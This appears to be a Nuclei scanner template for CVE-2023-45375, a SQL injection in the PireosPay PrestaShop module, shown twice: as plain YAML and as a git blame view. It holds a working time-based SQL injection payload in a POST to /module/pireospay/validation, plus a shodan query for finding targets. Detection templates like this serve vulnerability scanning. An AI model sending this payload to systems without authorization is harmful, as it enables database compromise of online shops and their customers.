nuclei-templates/http/cves/2023/CVE-2023-45375.yaml

id: CVE-2023-45375
info:
  name: PrestaShop PireosPay - SQL Injection
  author: MaStErChO
  severity: high
  description: |
    In the module “PireosPay” (pireospay) up to version 1.7.9 from 01generator.com for PrestaShop, a guest can perform SQL injection in affected versions.
  reference:
    - https://security.friendsofpresta.org/modules/2023/10/12/pireospay.html
    - https://github.com/fkie-cad/nvd-json-data-feeds
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 8.8
    cve-id: CVE-2023-45375
    cwe-id: CWE-89
    epss-score: 0.01204
    epss-percentile: 0.8517
    cpe: cpe:2.3:a:01generator:pireospay:*:*:*:*:*:prestashop:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: 01generator
    product: pireospay
    framework: prestashop
    shodan-query: "http.component:\"prestashop\""
  tags: cve,cve2023,sqli,prestashop,pireospay,01generator
flow: http(1) && http(2)

http:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - status_code == 200
          - contains(body, "/modules/pireospay/")
        condition: and
        internal: true

  - raw:
      - |
        @timeout: 20
        POST /module/pireospay/validation HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        ajax=true&MerchantReference=1%22;select(0x73656c65637420736c6565702836293b)INTO@a;prepare`b`from@a;execute`b`;--

    host-redirects: true
    max-redirects: 3
    matchers:
      - type: dsl
        dsl:
          - duration>=6
          - status_code == 302
          - contains(content_type, "text/html")
        condition: and
# digest: 4a0a004730450220645cf42d390fd2f7e6fc37c997c7f9c6ab7a133204cfcdf3f810e9b3057df10a022100a860757d5de921d63a30dbd34e422428e685a3f8c210882430d572a07af8d8bf:922c64590222798bb761d5b6d8e72950
Fixes and 2023 CvEs 2024-03-16 17:23:48 +00:00			`id: CVE-2023-45375`
			`info:`
minor format changes 2024-04-15 12:34:11 +00:00			`name: PrestaShop PireosPay - SQL Injection`
Fixes and 2023 CvEs 2024-03-16 17:23:48 +00:00			`author: MaStErChO`
			`severity: high`
			`description: \|`
			`In the module “PireosPay” (pireospay) up to version 1.7.9 from 01generator.com for PrestaShop, a guest can perform SQL injection in affected versions.`
			`reference:`
			`- https://security.friendsofpresta.org/modules/2023/10/12/pireospay.html`
minor format changes 2024-04-15 12:34:11 +00:00			`- https://github.com/fkie-cad/nvd-json-data-feeds`
			`classification:`
			`cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H`
			`cvss-score: 8.8`
			`cve-id: CVE-2023-45375`
			`cwe-id: CWE-89`
product/queries updated 2024-05-31 19:23:20 +00:00			`epss-score: 0.01204`
			`epss-percentile: 0.8517`
minor format changes 2024-04-15 12:34:11 +00:00			`cpe: cpe:2.3:a:01generator:pireospay::::::prestashop::*`
Fixes and 2023 CvEs 2024-03-16 17:23:48 +00:00			`metadata:`
minor format changes 2024-04-15 12:34:11 +00:00			`verified: true`
TemplateMan Update [Fri Jun 7 10:04:28 UTC 2024] :robot: 2024-06-07 10:04:29 +00:00			`max-request: 2`
minor format changes 2024-04-15 12:34:11 +00:00			`vendor: 01generator`
			`product: pireospay`
Fixes and 2023 CvEs 2024-03-16 17:23:48 +00:00			`framework: prestashop`
TemplateMan Update [Fri Jun 7 10:04:28 UTC 2024] :robot: 2024-06-07 10:04:29 +00:00			`shodan-query: "http.component:\"prestashop\""`
			`tags: cve,cve2023,sqli,prestashop,pireospay,01generator`
minor format changes 2024-04-15 12:34:11 +00:00			`flow: http(1) && http(2)`
Fixes and 2023 CvEs 2024-03-16 17:23:48 +00:00
			`http:`
			`- raw:`
			`- \|`
minor format changes 2024-04-15 12:34:11 +00:00			`GET / HTTP/1.1`
			`Host: {{Hostname}}`

			`matchers:`
			`- type: dsl`
			`dsl:`
			`- status_code == 200`
			`- contains(body, "/modules/pireospay/")`
			`condition: and`
			`internal: true`

			`- raw:`
			`- \|`
Merge branch 'main' into optimize-mth 2024-09-26 05:02:14 +00:00			`@timeout: 20`
Fixes and 2023 CvEs 2024-03-16 17:23:48 +00:00			`POST /module/pireospay/validation HTTP/1.1`
			`Host: {{Hostname}}`
			`Content-Type: application/x-www-form-urlencoded`

			ajax=true&MerchantReference=1%22;select(0x73656c65637420736c6565702836293b)INTO@a;prepare`b`from@a;execute`b`;--

Optimized some templates due nuclei change and added new templates 2024-07-14 16:15:12 +00:00			`host-redirects: true`
lint fix 2024-09-26 05:11:44 +00:00			`max-redirects: 3`
Fixes and 2023 CvEs 2024-03-16 17:23:48 +00:00			`matchers:`
			`- type: dsl`
			`dsl:`
minor format changes 2024-04-15 12:34:11 +00:00			`- duration>=6`
			`- status_code == 302`
			`- contains(content_type, "text/html")`
Auto Template Signing [Fri May 3 05:50:08 UTC 2024] :robot: 2024-05-03 05:50:08 +00:00			`condition: and`
chore: sign templates 🤖 2024-09-26 05:37:30 +00:00			`# digest: 4a0a004730450220645cf42d390fd2f7e6fc37c997c7f9c6ab7a133204cfcdf3f810e9b3057df10a022100a860757d5de921d63a30dbd34e422428e685a3f8c210882430d572a07af8d8bf:922c64590222798bb761d5b6d8e72950`